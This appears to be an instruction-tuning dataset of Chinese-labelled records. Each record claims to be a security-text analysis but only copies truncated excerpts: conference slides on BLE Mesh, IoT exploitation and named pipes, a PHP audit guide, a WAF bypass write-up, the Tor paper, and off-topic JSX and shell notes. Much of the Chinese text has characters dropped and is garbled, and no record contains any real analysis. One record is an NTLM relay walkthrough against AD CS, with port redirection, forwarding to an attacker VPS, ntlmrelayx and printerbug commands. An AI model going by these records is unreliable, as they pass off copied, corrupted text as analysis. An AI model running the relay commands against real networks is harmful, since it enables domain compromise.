{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents BrokenMesh: New Attack Surfaces of Bluetooth Mesh Han Yan, Lewei Qu, Dongxiang Ke Baidu AIoT Security Team #BHUSA @BlackHatEvents Information Classification: General About US Baidu AIoT Security Team  Focus on Android / Linux platform  Aim to discover 0day vulnerability and explore possible defenses Members  Han Yan  Lewei Qu  Dongxiang Ke #BHUSA @BlackHatEvents Information Classification: General Agenda  Introduction to Bluetooth Mesh  Attack Surfaces Analysis  BLE Mesh Fuzzer  Case Study  Summary #BHUSA @BlackHatEvents Information Classification: General 1 Introduction to Bluetooth Mesh What is Bluetooth Mesh  Aka, Bluetooth LE Mesh, BLE Mesh  A wireless mesh networking technology based on BLE  Made public by Bluetooth Special Interest Group (Bluetooth SIG) in 2017 Smart Home Industrial IoT #BHUSA @BlackHatEvents Information Classification: General Bluetooth Mesh vs Bluetooth Classic/LE Key Differences  Bluetooth Mesh is a networking technology, analogous to TCP/IP  Bluetooth Classic/LE are wireless communication technologies Network Layer in Protocol Stack #BHUSA @BlackHatEvents Information Classification: General Network Topology Node Type  Node  Relay node  Low Power node  Friend node Managed Flooding  Based on advertising  Non-central  Non-routing #BHUSA @BlackHatEvents Information Classification: General Network Addresses Address Type Address Validity Address Type Values Unassigned Address 16bits, 0b0000000000000000 Unicast Address 16bits, 0b0xxxxxxxxxxxxxxx Virtual Address 16bits, 0b10xxxxxxxxxxxxxx Group Address 16bits, 0x11xxxxxxxxxxxxxx Address Type Valid as SRC Valid as DST Unassigned Address No No Unicast Address Yes Yes Virtual Address No Yes Group Address No Yes #BHUSA @BlackHatEvents Information Classification: General Message-Oriented Communication Publish  Sending message  Publish to a unicast / group / virtual address Subscribe  Receiving message  Subscribe to a group / virtual address Example  Some lights subscribe to the g", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### JSX语法 JSX就是 React.js 描述页面 UI 的方式JSX 其实就是 JavaScript 对象 JSX语法需要bable进行编译React.createElement() ``` import React from 'react' import ReactDOM from 'react-dom' const element = <h1>Hello world</h1>; ReactDOM.render(element,document.querySelector('#root')) ``` JSX为我们提供了创建react元素方法React.createElement(component, props, ...children)的语法糖syntactic sugar上面的代码实质上等价于 ```js import React from 'react' import ReactDOM from 'react-dom' var element = React.createElement( \"h1\", null, \"Hello, world!\" ) ReactDOM.render(element,document.getElementById('root')) ``` 每个 DOM 元素的结构都可以用 JavaScript 的对象来表示你会发现一个 DOM 元素包含的信息其实只有三个标签名属性子元素 ```html <div> <h1 className='title'>React</h1> </div> ``` 所以 HTML的所有的信息我们都可以用合法的 JavaScript 对象来表示的 ```jsx React.createElement( \"div\", null, React.createElement( \"h1\", { className: 'title' }, \"React\" ) ) ``` **嵌入变量** 用大括号包裹 ``` let name = 'Liu' let element = <p className = {name} /> ``` 大括号内可以写入变量数字求值表达式... ``` let name = 'LiuEnQing' let male = true let obj = { age:24, tal:13947368104 } let ele = <p> {name}<br /> {obj.age}<br /> <span>{male ? '男' : '女'}</span> </p> ``` 注释 ``` {/*[需要注释内容]*/} ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ntime === 统计给定命令所花费的总时间 ## 补充说明 `time` 命令是用来确定一个给定的命令需要运行多长时间它对于测试你的脚本和命令的性能很有用 例如如果你有两个不同的脚本在做同样的工作你想知道哪一个表现得更好你可以用 Linux 的时间命令来确定每个脚本的执行时间 该指令是 shell 内指令也是一个软件包**对于软件包的说明在这篇文档靠下的部分** ## 语法 ```shell time <指令> ``` ## 参数 指令指定需要运行的额指令及其参数 ## 实例 当测试一个程序或比较不同算法时执行时间是非常重要的一个好的算法应该是用时最短的所有类UNIX系统都包含time命令使用这个命令可以统计时间消耗例如 ```shell $ time ls anaconda-ks.cfg install.log install.log.syslog satools text real 0m0.009s user 0m0.002s sys 0m0.007s ``` 这里的输出会因为使用的发行版本不同而导致展示的结果不同比如 ```shell # Bash real 0m33.961s user 0m0.340s sys 0m0.940s # Zsh 0.34s user 0.94s system 4% cpu 33.961 total # GNU time (sh) 0.34user 0.94system 0:33.96elapsed 4%CPU (0avgtext+0avgdata 6060maxresident)k 0inputs+201456outputs (0major+315minor)pagefaults 0swaps ``` `real` 或者 `total` 或者 `elapsed`挂钟时间是指从调用开始到结束的时间它是指从你按下回车键的那一刻开始到命令完成的那一刻为止的时间 user - 在用户模式下花费的CPU时间 system 或 sys - 在内核模式下花费的CPU时间 ## 软件包 接下来的部分是关于 `time` 软件包提供的 `/usr/bin/time` 二进制可执行程序而不是 shell 内建的 time 命令 ### 软件包的语法 一些 shells例如 `bash` 有一个内置的 `time` 命令提供类似的关于时间和可能的其他资源的使用信息 要访问真正的命令可能需要指定其路径名类似于`/usr/bin/time` ```shell time [options] command [arguments...] ``` ### 软件包指令参数 -f format, --format=format 指定输出格式可能覆盖环境变量TIME中指定的格式 -p, --portability 使用可移植的输出格式 -o file, --output=file 不将结果发送到stderr而是覆盖指定的文件 -a, --append (与-o一起使用)不覆盖而是附加 -v, --verbose 对程序知道的所有信息进行非常详细的输出 -q, --quiet 不报告异常的程序终止当命令被信号终止时或非零退出状态 ### 软件包实例 使用`-o`选项将执行时间写入到文件中 ```shell /usr/bin/time -o outfile.txt ls ``` 使用`-a`选项追加信息 ```shell /usr/bin/time -a -o outfile.txt ls ``` 使用`-f`选项格式化时间输出 ```shell /usr/bin/time -f \"time: %U\" ls ``` `-f`选项后的参数 参数 | 描述 --- | --- `%E` | real时间显示格式为[小时:]分钟:秒 `%U` | user时间 `%S` | sys时间 `%C` | 进行计时的命令名称和命令行参数 `%D` | 进程非共享数据区域以KB为单位 `%x` | 命令退出状态 `%k` | 进程接收到的信号数量 `%w` | 进程被交换出主存的次数 `%Z` | 系统的页面大小这是一个系统常量不用系统中常量值也不同 `%P` | 进程所获取的CPU时间百分百这个值等于 `user+system` 时间除以总共的运行时间 `%K` | 进程的平均总内存使用量data+stack+text单位是 `KB` `%w` | 进程主动进行上下文切换的次数例如等待I/O操作完成 `%c` | 进程被迫进行上下文切换的次数由于时间片到期 ## 参考资料 - Linux Time Command | Linuxize <https://linuxize.com/post/linux-time-command/> - tim", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n原文 by 80vul ## 高级PHP应用程序漏洞审核技术 ### 前言 PHP是一种被广泛使用的脚本语言尤其适合于web开发具有跨平台容易学习功能强大等特点据统计全世界有超过34%的网站有php的应用包括Yahoosina163sohu等大型门户网站而且很多具名的web应用系统包括bbs,blog,wiki,cms等等都是使用php开发的Discuzphpwindphpbbvbbwordpressboblog等等随着web安全的热点升级php应用程序的代码安全问题也逐步兴盛起来越来越多的安全人员投入到这个领域越来越多的应用程序代码漏洞被披露针对这样一个状况很多应用程序的官方都成立了安全部门或者雇佣安全人员进行代码审计因此出现了很多自动化商业化的代码审计工具也就是这样的形势导致了一个局面大公司的产品安全系数大大的提高那些很明显的漏洞基本灭绝了那些大家都知道的审计技术都无用武之地了我们面对很多工具以及大牛扫描过n遍的代码有很多的安全人员有点悲观而有的官方安全人员也非常的放心自己的代码但是不要忘记了没有绝对的安全我们应该去寻找新的途径挖掘新的漏洞本文就给介绍了一些非传统的技术经验和大家分享 另外在这里特别说明一下本文里面很多漏洞都是来源于网络上牛人和朋友们的分享在这里需要感谢他们  ### 传统的代码审计技术 WEB应用程序漏洞查找基本上是围绕两个元素展开变量与函数也就是说一漏洞的利用必须把你提交的恶意代码通过变量经过n次变量转换传递最终传递给目标函数执行还记得MS那句经典的名言吗一切输入都是有害的这句话只强调了变量输入很多程序员把输入理解为只是gpc[$_GET,$_POST,$_COOKIE]但是变量在传递过程产生了n多的变化导致很多过滤只是个纸老虎我们换句话来描叙下代码安全一切进入函数的变量是有害的 PHP代码审计技术用的最多也是目前的主力方法静态分析主要也是通过查找容易导致安全漏洞的危险函数常用的如grepfindstr等搜索工具很多自动化工具也是使用正则来搜索这些函数下面列举一些常用的函数也就是下文说的字典暂略但是目前基本已有的字典很难找到漏洞所以我们需要扩展我们的字典这些字典也是本文主要探讨的 其他的方法有通过修改PHP源代码来分析变量流程或者hook危险的函数来实现对应用程序代码的审核但是这些也依靠了我们上面提到的字典 ### PHP版本与应用代码审计 到目前为止PHP主要有3个版本php4php5php6由于php缺少自动升级的机制导致目前PHP版本并存也导致很多存在漏洞没有被修补这些有漏洞的函数也是我们进行WEB应用程序代码审计的重点对象也是我们字典重要来源 ### 其他的因素与应用代码审计 很多代码审计者拿到代码就看他们忽视了安全是一个整体代码安全很多的其他因素有关系比如上面我们谈到的PHP版本的问题比较重要的还有操作系统类型主要是两大阵营win/*nixWEB服务端软件主要是iis/apache两大类型等因素这是由于不同的系统不同的WEB SERVER有着不同的安全特点或特性下文有些部分会涉及 所以我们在做某个公司WEB应用代码审计时应该了解他们使用的系统WEB服务端软件PHP版本等信息 ### 扩展我们的字典 下面将详细介绍一些非传统PHP应用代码审计一些漏洞类型和利用技巧 ### 变量本身的key 说到变量的提交很多人只是看到了GET/POST/COOKIE等提交的变量的值但是忘记了有的程序把变量本身的key也当变量提取给函数处理 ``` php <?php //key.php?aaaa'aaa=1&bb'b=2 //print_R($_GET); foreach ($_GET AS $key => $value) { print $key.\"\\n\"; } ?> ``` 上面的代码就提取了变量本身的key显示出来单纯对于上面的代码如果我们提交URL `key.php?<script>alert(1);</script>=1&bbb=2` 那么就导致一个xss的漏洞扩展一下如果这个key提交给include()等函数或者sql查询呢 漏洞审计策略PHP版本要求无 系统要求无 审计策略通读代码 ### 变量覆盖 很多的漏洞查找者都知道extract()这个函数在指定参数为EXTR_OVERWRITE或者没有指定函数可以导致变量覆盖但是还有很多其他情况导致变量覆盖的如 ### 遍历初始化变量 请看如下代码 ``` php <?php //var.php?a=fuck $a='hi'; foreach($_GET as $key => $value) { $$key = $value; } print $a; ?> ``` 很多的WEB应用都使用上面的方式注意循环不一定是foreach如Discuz!4.1的W", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrom Dvr to See Exploit of IoT Device 0K5y Nobody@360GearTeam 1559113201 Date Larryxi Nobody@360GearTeam Whats time 0x00 Content 0x01 Preface 0x02 Vulnerability Mining 0x03 Debugging Environment 0x04 Exploiting 0x05 Summary 0x01 Preface Welcome and Thanks IoT Four Modules IoT Current Situation and Problems IoT Architecture and Exploit IoT Attack Roads to Rome 0x02 Vulnerability Mining Environment Preview Get firmware in ten ways Software Hardware Get information after first-look `telnetd` commented out in `etc/init.d/S99` Weak password found in `/etc/passwd` Armel architecture known by `file /bin/busybox` Get general method Web-side command injection or buffer overflow Obtain the shell by the root weak password or not 0x02 Vulnerability Mining Web Vulnerability Static resources of the background pages can be seen in burp Identity information is passed in url to get dynamic resources Some cgis can be accessed without authentication Some cgis can execute certain commands such as reboot USELESS 0x02 Vulnerability Mining Buffer Overflow 0x02 Vulnerability Mining Buffer Overflow 0x03 Debugging Environment Get Debug Interface Cannot remote debug through telnet shell UART interface only has log output Cannot get system shell through modifying uboot init args Face Problems REPACKING 0x03 Debugging Environment Get Debug Interface Round One 0x03 Debugging Environment Get Debug Interface Round Two 0x03 Debugging Environment Get Debug Interface Fight 0x03 Debugging Environment Cross-compilation Environment gdbserver-7.7 + gdb-multiarch-7.12 = keng gdbserver-7.11 + gdb-multiarch-7.12 = zhengxiang 0x04 Exploiting Security Mechanism No GS No NX ASLR is 1, address of uClibc is indeed randomized Vectors segment address range is fixed Watchdog exists in kernel module 0x04 Exploiting Security Mechanism 0x04 Exploiting Exploit Plan Get exception before function returns Haystack of strcasestr is overwriten in payload Get fixed readable address in vectors section 0x04 Exploiting Exploit ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n探寻Java件上传流量层waf绕过姿势系 列 探寻Java件上传流量层waf绕过姿势系列 写在前 正 tomcat 灵活的parseQuotedToken 变形之双写filename*与filename 变形之编码误 Spring4 猜猜我在第层 Spring5 \"双写\"绕过 写在前 这篇和上篇不同的是上篇更多关注于RFC档规范的部分这篇更关注于如何从代码层 上的利来绕过具体内容请接着往下看 正 tomcat 灵活的parseQuotedToken 继续看看这个解析value的函数它有两个终条件个是到最后个字符另个是遇 到 ; 如果我们能灵活控制终条件那么waf引擎在此基础上还能不能继续准确识别呢 如果你理解了上的代码你就能构造出下的例 private String parseQuotedToken(final char[] terminators) { char ch; i1 = pos; i2 = pos; boolean quoted = false; boolean charEscaped = false; while (hasChar()) { ch = chars[pos]; if (!quoted && isOneOf(ch, terminators)) { break; } if (!charEscaped && ch == '\"') { quoted = !quoted; } charEscaped = (!charEscaped && ch == '\\\\'); i2++; pos++; } return getToken(true); } 同时我们知道jsp如果带 \" 符号也是可以访问到的因此我们还可以构造出这样的例 还能更复杂点么当然可以的结合这的 \\ 以及上篇章当中提到的 org.apache.tomcat.util.http.parser.HttpParser#unquote 中对出现 \\ 后参数的转 化操作这时候如果waf检测引擎当中是以最近 \"\" 作为对闭合的匹配那么waf检测引擎可 能会认为这上传的件名是 y4tacker.txt\\ ,从放 变形之双写filename*与filename 这个场景相对简单 先tomcat的 org.apache.catalina.core.ApplicationPart#getSubmittedFileName 的场景下件上传解析header的过程当中存在while循环会不断往后读取最终会将 key/value以Haspmap的形式保存那么如果我们写多个那么就会对其覆盖在这个场景下绕过 waf引擎没有设计完善在同时出现两个filename的时候到底取第个还是第个还是都处理 这些差异性也可能导致出现些新的场景 同时这下会删除最后个 * 另如果 lowerCaseNames 为 true 那么参数名还会转为写恰好这确实设置了 这点 因此综合起来可以写出这样的payload当然结合上篇还可以变得更多变这不再讨论 变形之编码误 假设这样个场景waf同时持多个语也升级到了新版本会解析 filename* 假设go 当中有个编码叫y4java当中没有waf为了效率将两个混合处理这样会导致什么问题 呢 如果没有,这报错后会保持原来的值因此我认为这也可以作为种绕过思路 Spring4 这我了 springboot1.5.20RELEASE + springframework4.3.23 这不去研究版 本间是否有差异只看看版本了 猜猜我在第层 说个前提这只针对单件上传的情况虽然这的代码逻辑眼看出不能有上那种存在 双写的问题但是这又有个更有趣的现象 try { paramValue = RFC2231Utility.hasEncodedValue(paramName) ? RFC2231Utility.decodeText(paramValue) : MimeUtility.decodeText(paramValue); } catch (final UnsupportedEncodingException e) { // let's keep the original value in this case } 我们来看看这个 extractFilename 函数到底有啥骚操作吧这靠函数 indexOf 去定 位key(filename=/filename*=)再做截取操作 private String extractFilename(String contentDisposition, String key) { if (contentDisposition == null) { return null; } else { int startIndex = contentDisp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n滴滴SDL体系建设 范世强 2020.12.17 --滴滴SDL从0-1建设历程 目录 滴滴SDL建设历程概览 02 个人介绍 01 滴滴SDL建设历程详解 03 滴滴SDL现在与未来 04 10余年安全从业经历  国舜科技-安全服务  CNCERT-渗透测试  阿里云-云产品安全  滴滴出行-SDL负责人 2017年加入滴滴参与了整个滴滴SDL从0-1的建设过程 01 个人介绍 02 滴滴SDL建设历程概览 01 滴滴SDL建设历程概览 开发生命周期 滴滴SDL 2017 安全开发技术咨询 设计方案评估 提供安全开发规范 黑盒扫描 三方组件扫描 代码安全评估 SRC漏洞运营 资产库建设 SDLSecurity Development Lifecycle 安全开发生命周期 需求 设计 开发 准入 上线 运营 测试 线上安全开发培训 滴滴SDL 2018 滴滴SDL 2019 滴滴SDL 2020 自研代码扫描 提供安全SDK 商用代码扫描 黑盒扫描 安全评估平台化 代码审计手册 漏洞月报 安全评估自动化 自研代码扫描 漏洞月报自动化 03 滴滴SDL建设历程详解 01 滴滴SDL 2017 背景研发自由上线SDL无感知SRC安全漏洞多 系统上线 触发卡点 安全评估 发布上线 资产梳理 尚未覆盖 绕过卡点 线上域名 线 上 IP 代码仓库  域名申请 代码准入 采购软件 ... 重点建设方向  建立流程卡点  制定上线规范 正向覆盖 反向覆盖 02 滴滴SDL 2018 背景各项工作通过人肉开展自动化程度低过程依赖邮件钉钉等方式知识不能沉淀各项工作无流程闭环 重点建设方向  SDL一站式工作平台上线 --数据沉淀流程线上闭环 --建设漏洞知识库及方案库  自研黑盒与测试环境打通 --多渠道流量采集进行扫描  商用白盒与部署系统打通 --自研检测规则  三方组件检测上线 --打通构建平台拉取组件依赖 03 滴滴SDL 2019 背景安全评估数量巨大人效明显不足 重点建设方向  安全评估自动化 --将各个场景的风险提炼成规则引擎  自研白盒扫描工具 --基于图搜索技术  重新制定开发规范 项目信息输入 反复沟通 按要求设计实现 提交代码及 测试环境 研发人员 SDL安全工程师 输出安全要求方案 人工评估流程图 输出review结果 整改上线 业务分析 威胁建模 人工代码 审计 关键信息输入 按要求设计实现 提交代码 研发人员 SDL平台 输出安全要求安全方案 自动化评估流程图 输出基线review结果 整改上线 规则引擎 自研代码检测 引擎 04 滴滴SDL 2020 背景线上漏洞下降以逻辑漏洞为主工具成熟度低流程体验不足研发安全意识仍有较大提升空间 白盒+基线左移 研发安全教育 安全SDK 上线指标大盘  目的 提升覆盖降低后期 修复成本  方法 ① 自研白盒在CI/CD 流水线中左移至构 建阶段 ② 开发/测试阶段自 助检测/修复  目的 提升研发安全编码  方法 ① 将安全开发录制成 系列短视频 ② 短视频按需组成课 程包推送给新研 发 ③ 将短视频形式嵌入 知识库  目的 降低研发修复成本  方法 ① 常用安全功能及漏 洞修复标准化 ② 提供安全SDK给研 发使用  目的 提升运营效率  方法 ① 将覆盖率检出率 修复率漏洞分布 扫描时长NPS 等各项指标自动化 计算 ② 在SDL平台提供指 标大盘 05 关于如何做好SDL我的几个观点  一开始不要研究多么牛逼的技术和工具先把覆盖率搞上去  做好资产建设资产不清楚是很多问题的根源  工具不在多技术不需要多牛对标问题是关键  建立有效的指标评价体系保证运营的有效性  做好漏洞和事件的持续复盘改进发生事件不一定是坏事  技术栈的复杂度代码来源的多样性互联网业务高频迭代给SDL带来了极大的挑战把漏洞不是唯一的手段 也要多依赖安全培训网络隔离内外部蓝军白帽子等其他手段 04 滴滴SDL的现在与未来 DEV Gitlab 编译构建 产品&组件库 代码准入 代码部署 安全 评估 白盒 扫描 拉取代码 提供产品包 提供依赖的组件 线上运行 黑盒 扫描 QA 采集预发流量 通知扫描引擎 线下测试 黑盒 扫描 线下测试环境 agent流量采集 接入层转发 黑盒 扫描 请求日志 组件 检测 提供组件依赖信息 打包 通知安全评估 白盒 扫描 安全 培训 研发人员信息 OPS 组件 检测 采集组件信息 02 滴滴SDL自动化能力部署 03 滴滴SDL的未来 降发生 逻辑漏洞检测自动化 工具链+资产库打通  安全感 Devsecops体系建设 赋能研发提升效率体验  招贤纳士 欢迎对SDL有兴趣的同学加入我们共建 滴滴SDL 微信fsqsec", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n[译] 渗透测试实战第三版(红队版) 译者Snowming雪茗 时间北京时间 2019-03-17 本书英文名The Hacker Playbook 3 阅读 在 Github 上阅读本书 免责声明 @Snowming 纯粹出于学习目的与个人兴趣翻译本书本人承诺绝不用此译文谋取任何形式的经济利益也坚决拒绝 其他任何人以此牟利 本译文只供学习研究参考之用不得用于商业用途@Snowming 保留对此版本译文的署名权及其它相关权利 若有人使用本译文进行侵权行为或者违反知识产权保护法的任何行为与本译者无关译者坚决反对此类行为 任何转载必须注明出处 译者的话 这本书是 The Hacker Playbook 的第三版通常我们也说它是红队版因为本书是以红蓝对抗中红队的视角来撰 写的 首先要说一声抱歉因为我的翻译可能并不是特别好首先整本书是在三周的时间仅由我一个人翻译完的因为本 人临近硕士毕业不可能花太多时间来作这件事情而且这本书的专业程度比较高并不是一本科普读物而译者的 专业水平有限所以可能对本书的理解上也受限于我的专业水平但是译者尽力以最大的诚意来完成此书的翻 译我寻求的效果是完成本书作者与中文读者之间的连接基于此目标我的翻译原则有以下几条: 1. 对每一个句子我并非在词义的层面上简单的译为中文,而是按照自己的理解翻译的我有一种观点如果那样 的话与谷歌翻译有什么区别呢所以我会在词义的基础上去理解作者的每一句话查阅相关资料结合词 义句意专业知识背景来翻译所以读者可以看到我在一些地方贴出了一些补充资料我希望我的翻译既 保留作者原意也更符合中文其中若有不明之处我跟几位比我从业经验丰富的安全行业朋友进行了讨论 毕竟我资历尚浅若是因为自己的肤浅理解而误导读者那可真是我的过错了对每一个句子只有我自己让 我是可以读懂的我才会贴上来 2. 因为中文和英文的确存在差异并非每一句英文的意思都可以用中文完全表达出同样的意思不可避免的存在 些个翻译出来比较奇怪的词语对于这种情况我会去互联网上基于关键词进行搜索参考诸如微软中文文档 之类的翻译最好是遵循他们的翻译惯例因为毋庸置疑的专业的微软文档工程师肯定比我的水平高 3. 译文中所有的链接我自己都点过一遍虽然我拿到的英文 PDF 有些链接自己都无法访问但是我尽力还原作者 原意通过网络搜索找到正确链接贴上对于其他的过期链接我也会更附上说明这里必须说明事实上不 断的有一些链接失效仅仅我翻译的这三周到我今天定稿就很多失效了我也只能尽量贴上最新的链接 4. 一些专业术语保留英文常用习惯因为毕竟本书不是一本科普书我身边很多安全从业者不会把 payload 说 成攻击载荷所以本书中除第一次遇到 payload 会附注攻击载荷后面一律使用payload类似的专业术语还 包括 beaconPOCAD 等 5. 一些工具里面的选项保留英文因为若翻译为中文可能导致读者无法找到该选项操作不便反而弄巧成 拙 6. 关于译者注我思故我惑书里也有很多我读不懂的不太理解的知识盲区读的时候我会查找相关资 料但是我就会想为什么不把我找到的觉得不错的资料分享给读者呢这就是我的翻译中那些译者注的 由来因为我把这个翻译当作书+笔记本来用了所以有很多连接那是因为我自己也要看如果你不看请忽 略并且既然这是中文翻译所以我分享的参考资料以中文资料为主英文链接是我觉得特别好的文章才会 附上 7. 我拿到的英文 PDF 版本上面的一些代码存在问题比如这一句书中的原代码 python SharpShooter.py  interactive 但是  其实应该是 -- 本书中有多个这种错误所以根据译者经验  如果你跑不通的话 读者可以自行替换为 - 或 -- 来试试或许就可以跑通了实在再跑不通的话可以在网上进行搜索 8. PDF 版本中如果用 [] 括起来的链接无法访问请观察 URL根据情况删除 ] 一般就可以访问了 阅读建议 1. 先大概理解每一章讲的是什么比如 第一章 环境搭建 第二章 信息收集 第三章 web漏洞利用 第四章 内网横向移动和权限提升 ...... 在心里有个这种朴素的目录能帮助你读完本书后对红队工作流程心中有数 2. 根据用途对本书中提到的所有你觉得好的工具建一个速查清单我觉得你可以参考这篇来建适用于渗透测试 不同阶段的工具收集整理 3. 本书毕竟是一本外语书有的工具不适合国内环境大家自行取舍 对于本书的一些想法 技术的发展日新月异所以本书中的一些工具可能有些过时了我们对本书中的内容无需盲从可以结合一些自己的 思考 比如第七章的内容可能会有些跟不上时代但其实第七章中重新编译 msf 其实就是为了 1. 尽可能消除 msf 的流量指纹特征 2. 强化 msf 的 payload 的一些静态免杀能力 3. 自定义添加一些功能和 C2 交互方面动态执行", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Call the plumber  You have a leak in your (named) pipe Gil Cohen 2  Presenter introduction  Key terms  Connecting to named pipes  Pipe ACLs And Connection Limitation  Named pipes in the wild Agenda  Enumerating And Scanning For Named Pipes  Sniffing Named Pipes Content  Fuzzing Named Pipes  Exploitation And Impact  Case studies & Live demo!  Mitigation And Defense 3 Gil Cohen CTO, Comsec Global  IDF Programming course graduate (Mamram) and former waterfall developers  Cyber Security professional with more than 12 years of experience  Vast comprehensive knowledge in penetration tests, secured design, programmers training and information security in general 30 years Established in 1987, Comsec has nearly three- decades of experience in all aspects of information security. 150 consultants Allows us to deliver a broad spectrum of services and to provide a uniquely flexible service level. 600 clients From blue chip companies to start-ups, Comsec has a deep sector expertise in most verticals and un- paralleled understanding of our clients business environment. 22 countries With offices in London, Rotterdam and excellence center in Tel Aviv, Comsec is able to deliver global impact through local presence spanning over 22 countries and five continents. Your host 4 Key Terms 5 Introduction To Key Terms IPC or Inter-Process Communication  An operating system mechanism that allows processes and applications to manage shared data and communicate  Categorized as clients and servers, where the client requests data and the server responds to client requests  Many applications are both clients and servers, as commonly seen in distributed computing 6 Introduction To Key Terms Windows Named Pipes  One of the methods to perform IPC in Microsoft Windows  One-way or duplex pipe for communication between the pipe server and one or more pipe clients  Utilizes a unique file system called NPFS(Named Pipe Filesystem)  Any process can access named pipes, subject to security checks  All insta", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTor: The Second-Generation Onion Router Roger Dingledine The Free Haven Project arma@freehaven.net Nick Mathewson The Free Haven Project nickm@freehaven.net Paul Syverson Naval Research Lab syverson@itd.nrl.navy.mil Abstract We present Tor, a circuit-based low-latency anonymous com- munication service. This second-generation Onion Routing system addresses limitations in the original design by adding perfect forward secrecy, congestion control, directory servers, integrity checking, configurable exit policies, and a practi- cal design for location-hidden services via rendezvous points. Tor works on the real-world Internet, requires no special priv- ileges or kernel modifications, requires little synchronization or coordination between nodes, and provides a reasonable tradeoff between anonymity, usability, and efficiency. We briefly describe our experiences with an international network of more than 30 nodes. We close with a list of open problems in anonymous communication. 1 Overview Onion Routing is a distributed overlay network designed to anonymize TCP-based applications like web browsing, se- cure shell, and instant messaging. Clients choose a path through the network and build a circuit, in which each node (or onion router or OR) in the path knows its predecessor and successor, but no other nodes in the circuit. Traffic flows down the circuit in fixed-size cells, which are unwrapped by a symmetric key at each node (like the layers of an onion) and relayed downstream. The Onion Routing project published several design and analysis papers [27, 41, 48, 49]. While a wide area Onion Routing network was deployed briefly, the only long-running public implementation was a fragile proof- of-concept that ran on a single machine. Even this simple deployment processed connections from over sixty thousand distinct IP addresses from all over the world at a rate of about fifty thousand per day. But many critical design and deploy- ment issues were never resolved, and the design has not", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSketchtools: Prototyping Physical Interaction Matt Cottam Tellart and Rhode Island School of Design 27 Sims Avenue, Providence, RI 02909 USA matt@tellart.com Abstract Industrial designers working in traditional media have the luxury of sketching, playing, and experimenting with their materials before constructing a finished product. Designers working with electronics and computers are relatively impoverished. To sketch with electronics or computers would typically require extensive training in engineering and ready access to inexpensive partsrequirements that most designers cant easily meet. This deficiencythis inability to work closely with materials before building with themhampers designers efforts to make products sensitive to human use. This paper describes an attempt to address this problem in a human-computer interaction (HCI) design studio at a major design school. The course itself was an exercise in design: it worked within severe constraints to address a human need. We describe our attempt to shape the course to meet students most pressing needs; our students attempts to work within the constraints of the course; and the outcomes of the course for students and faculty. The paper suggests that the course offers one way to experiment with HCI concepts, produce innovative solutions to design problems, andcruciallyhumanize new technologies and the design process. 1 Problem Statement How can industrial design (ID) students in a human-computer interface design studio course use electronics and computers with the same speed, fluidity, and fearlessness afforded by less expensive and more flexible materials? How can the studio encourage students to be sensitive to human needand to the complicated material and programmatic elements of their media? How can the studio create an environment in which students can use computer hardware and software as sketch materials? How can industrial designers extend their knowledge of engineering without encroaching on the work of ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前 在域内有很多种法可以获取域控权限包括不限于利溢出类的漏洞如ms17-010抓取域管密码当然也有 今天的主利ntlm relayntlm relay法有很多如利WPADLLMNR等被动性攻击利打印机等 主动性攻击核就是中继了他的net-ntlm但是呢利具监听的都是本地445端受害者机器与我们 通信的也是445端在windows上445端是占的难道利ntlm relay法只能基于linux机器 攻击过程 先把受控机的445端流量重定向到受控机的8445端然后把受控机的8445端转发到客机器的445端 上客机器利受控机的socks代理攻击其他机器 以攻击AD CS为例 环境如下 192.168.8.144 主域 192.168.8.155 辅域 vpsip cobaltstrike机器 192.168.8.75 受控机 受控机管理员权限执 利https://github.com/praetorian-inc/PortBender 把受控机的445端重定向到受控机的8445端先 把驱动传到当前shell录下pwd根据系统位数传 upload xxxx.sys 执重定向 PortBender redirect 445 8445 开启端转发 rportfwd 8445 vpsip 445 cs开启socks 客机器执 设置代理 开启relay proxychains4 ntlmrelayx.py -t http://192.168.8.144/certsrv/certfnsh.asp -smb2support -- adcs --template 'domain controller' 利socks或者exe触发强制回连如打印机 python printerbug.py rootkit.org/jerry:Admin12345@192.168.8.155 192.168.8.75 成功获取证书信息 总结 这最好spawn多个进程出来执不同的命令因为要做的实在太多了有重定向端转发socks如果全在 个session执可能会挂其次因为了很多层流量转发因此客机器上收到流量时会特别慢", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSAVING THE INTERNET Jay Healey @Jason_Healey Atlantic Council ~1436 ~1454 If there is something you know, communicate it. If there is something you don't know, search for it. Violates Privacy? Civil Liberties? Legal? Constitutional? If there is something you know, communicate it. If there is something you don't know, search for it. Global Internet Users 1993: 14 million 2003: 778 million 2013: 2.7 billion 2030? 2280? Data breaches Cyber crime Anonymous Malware Espionage State-sponsored attacks Stuxnet Heartbleed Erection of borders    Privacy Civil Liberties Security sep Future Economic and National Security Todays National Security Todays National Security Future Possibilities Until the End of Humankind Todays National Security How many future Renaissances and Enlightenments will humanity miss if we  all of us, for any purpose  keep treating the Internet as a place for crime, warfare and espionage? SECURITY FROM WHAT The DT and complexity Why Saving Global Shocks Initiated or Amplified Through the Internet As society becomes more technologic, even the mundane comes to depend on distant digital perfection. Dan Geer This increasingly tight coupling of the internet with the real economy and society means a full-scale cyber shock is far more likely to occur. Beyond Data Breaches: Global Interconnections of Cyber Risk Bad 